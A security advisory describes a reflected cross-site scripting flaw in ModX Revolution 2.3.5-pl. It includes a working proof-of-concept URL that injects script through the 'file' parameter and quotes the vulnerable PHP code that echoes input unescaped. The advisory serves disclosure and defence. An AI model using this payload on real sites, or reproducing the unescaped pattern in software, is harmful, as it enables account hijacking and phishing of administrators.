ModX Revolution 2.3.5-pl Cross Site Scripting
Posted on 19 August 2015
ModX Revolution 2.3.5-pl: Reflected Cross Site Scripting Vulnerability Security Advisory – Curesec Research Team 1. Introduction Affected Product: ModX Revolution 2.3.5-pl Fixed in: not fixed Fixed Version Link: n/a Vendor Contact: hello@modx.com Vulnerability Type: Reflected XSS Remote Exploitable: Yes Reported to vendor: 07/14/2015 Disclosed to public: 08/17/2015 Release mode: Full disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description ModX Revolution 2.3.5-pl is vulnerable to reflected cross site scripting. With this, it is possible to inject and execute arbitrary JavaScript code. This can for example be used by an attacker to inject a JavaScript keylogger, bypass CSRF protection, or perform phishing attacks. The attack can be exploited by getting the victim to click a link or visit an attacker controlled website. 3. Proof of Concept The injection takes place into the file GET argument, which is echoed inside script tags. http://localhost/modx-2.3.5-pl/manager/?a=system/file/edit&file=xsstest",record: {"name":"","basename":"","path":"","size":false,"last_accessed":"Jan 01, 1970 01:00:00 AM","last_modified":"Jan 01, 1970 01:00:00 AM","content":false,"image":false,"is_writable":false,"is_readable":false,"source":1},canSave: 0});});alert(1); </script>&wctx=mgr&source=1 4. Code manager/controllers/default/system/file/edit.class.php:28 public function loadCustomCssJs() { $this->addJavascript($this->modx->getOption('manager_url').'assets/modext/sections/system/file/edit.js'); $this->addHtml('<script type="text/javascript">Ext.onReady(function() { MODx.load({ xtype: "modx-page-file-edit" ,file: "'.$this->filename.'" ,record: '.$this->modx->toJSON($this->fileRecord).' ,canSave: '.($this->canSave ? 1 : 0).' }); });</script>'); } 5. Solution This issue was not fixed by the vendor. 5. Report Timeline 07/14/2015 Informed Vendor about Issue (no reply) 08/13/2015 Contacted Vendor again (no reply) 08/17/2015 Disclosed to public 6. Blog Reference: http://blog.curesec.com/article/blog/ModX-Revolution-235-pl-Reflected-Cross-Site-Scripting-Vulnerability-43.html
